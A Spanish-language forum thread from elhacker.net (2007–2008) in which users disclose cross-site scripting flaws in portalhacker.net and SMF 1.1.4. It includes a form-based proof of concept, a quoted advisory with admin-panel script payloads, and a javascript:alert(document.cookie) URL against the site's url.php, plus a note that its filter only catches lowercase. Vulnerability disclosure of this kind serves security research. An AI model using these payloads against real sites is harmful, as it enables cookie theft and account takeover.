elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  XSS en PortalHacker.net
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: XSS en PortalHacker.net  (Leído 7,139 veces)
WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.453


The Hacktivism is not a crime


Ver Perfil WWW
XSS en PortalHacker.net
« en: 2 Noviembre 2007, 00:54 am »

Hace tiempo encontré algunos XSS en elhacker.com y .org pero aún no los reparan a pesar del tiempo que llevan y de que fueron publicados y avisados. Ahora portalhacker.net también tiene un XSS localizado en el buscador de la pagina principal.

PoC:
Código
  1. <form name="buscarform" action="http://www.portalhacker.net/buscar.php" method="post">
  2. <input name="buscar" type="hidden" value="ok">
  3. <input name="query" type="text" size=12 value="Pon tu XSS acá">
  4. <input type="submit" value="Enviar"></form>
Donde puse "Pon tu XSS acá" prueba con enviar la siguiente petición post: "<script>alert(/xss/);</script>"

Después se quejan del porqué les roban las cookies.
« Última modificación: 2 Noviembre 2007, 01:02 am por WHK » En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: XSS en PortalHacker.net
« Respuesta #1 en: 2 Noviembre 2007, 01:04 am »

Si no me equivoco (Y creo que no) es un Bug en los Smf 1.1.4 ;) ;) ;) ;)
En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.453


The Hacktivism is not a crime


Ver Perfil WWW
Re: XSS en PortalHacker.net
« Respuesta #2 en: 2 Noviembre 2007, 01:05 am »

NO..... ese buscador no es propio del foro, el XSS de SMF es otro mas :P al final tienen como 4 XSS incluyendo web y foro pero la diferencia es que los que tu dices son solo locales y tendrías que tener derechos sobre el foro para crear los XSS, este que yo digo cualquiera puede crearlo.
« Última modificación: 2 Noviembre 2007, 01:09 am por WHK » En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: XSS en PortalHacker.net
« Respuesta #3 en: 2 Noviembre 2007, 01:07 am »

Umm ok..!

Ahora si te doy la razon. xD xD xD
"Despues se quejan"



Por cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!
En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.453


The Hacktivism is not a crime


Ver Perfil WWW
Re: XSS en PortalHacker.net
« Respuesta #4 en: 2 Noviembre 2007, 01:10 am »

Citar
Por cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!

No hay aún pero no te preocupes ya que no son remotos a menos que se incluya un CSRF aunque dudo mucho que SMF sea vulnerable a eso.

Supongo que te refieres a este:
Citar
  _____________________________________________________________________
_______
 |                                                                            |
 | __________.__                 __   __________               __             |
 | \______   \  | _____    ____ |  | _\______   \ ____   _____/  |_  ______   |
 |  |    |  _/  | \__  \ _/ ___\|  |/ /|       _//  _ \ /  _ \   __\/  ___/   |
 |  |    |   \  |__/ __ \\  \___|    < |    |   (  <_> |  <_> )  |  \___ \    |
 |  |______  /____(____  /\___  >__|_ \|____|_  /\____/ \____/|__| /____  >   |
 |         \/          \/     \/     \/       \/                        \/    |
 |----------------------------------------------------------------------------|
 |                                                                            |
 |    http://www.blackroots.it                  staff[at]blackroots[
dot]it      |
 |                                                                            |
 |    Autore : The-Dark_Man && Bled                                           |
 |____________________________________________________________________________|
 
 ##############################################################################
 #                                                                            #
 #                               XSS smf 1.1.4                                #
 #                                                                            #
 ##############################################################################
 
Found Xss in the administration...
 
1----------------------
Go to http://link/[path]/index.php?action=news
Modify the news and insert
<script>alert('Xss')</script>
Save the news! no an alert will be generated in every page!
 
2---------------------
Go to http://link/[path]/index.php?action=manageboards
Create a new forum with Title:
<script>alert('Xss')</script>
result? XSS  ;)
 
3---------------------
Go here http://link/[path]/index.php?action=membergroups;
Modify or create a new gruop and name it:
<script>alert('Xss')</script>
;)

----------------------
The-Dark_Man && Bled of blackroots.it
« Última modificación: 2 Noviembre 2007, 01:12 am por WHK » En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.453


The Hacktivism is not a crime


Ver Perfil WWW
Re: XSS en PortalHacker.net
« Respuesta #5 en: 13 Enero 2008, 03:24 am »

Nuevamente portalhacker tiene un nuevo xss:
http://foro.portalhacker.net/url.php?urlc=javascript:alert(document.cookie);

Parece que ese foro se ha descuidado muchisimo, ojala que no le pase lo mismo que a otro que le robaron el dominio por un xss.

Deja mucho de que hablar en cuanto a la calidad del servidor y del estado de la misma página.

¿Será mala administración?
En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: XSS en PortalHacker.net
« Respuesta #6 en: 13 Enero 2008, 03:32 am »

Es increible que un foro de 'hacking' descuide tanto su web/foro :P
En línea

NadiceJMA

Desconectado Desconectado

Mensajes: 185


Nca


Ver Perfil WWW
Re: XSS en PortalHacker.net
« Respuesta #7 en: 13 Enero 2008, 04:02 am »

parece que ya repararon el bug....
En línea

Thor


Desconectado Desconectado

Mensajes: 1.177


Ver Perfil
Re: XSS en PortalHacker.net
« Respuesta #8 en: 13 Enero 2008, 04:14 am »

No lo han reparado del todo, la página busca la palabra "javascript" pero... solo en minúsculas, esto sigue funcionando:
http://foro.portalhacker.net/url.php?urlc=javascript:alert(document.cookie);
En línea

sirdarckcat
Aspirante a supervillano
Moderador Global
***
Desconectado Desconectado

Mensajes: 7.019


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: XSS en PortalHacker.net
« Respuesta #9 en: 13 Enero 2008, 17:24 pm »

WHK.. la fuente.. ¬¬
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Que pasó con PortalHacker.net ?
Foro Libre
misionero2018 5 2,195 Último mensaje 28 Febrero 2019, 10:12 am
por MHFRAN
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines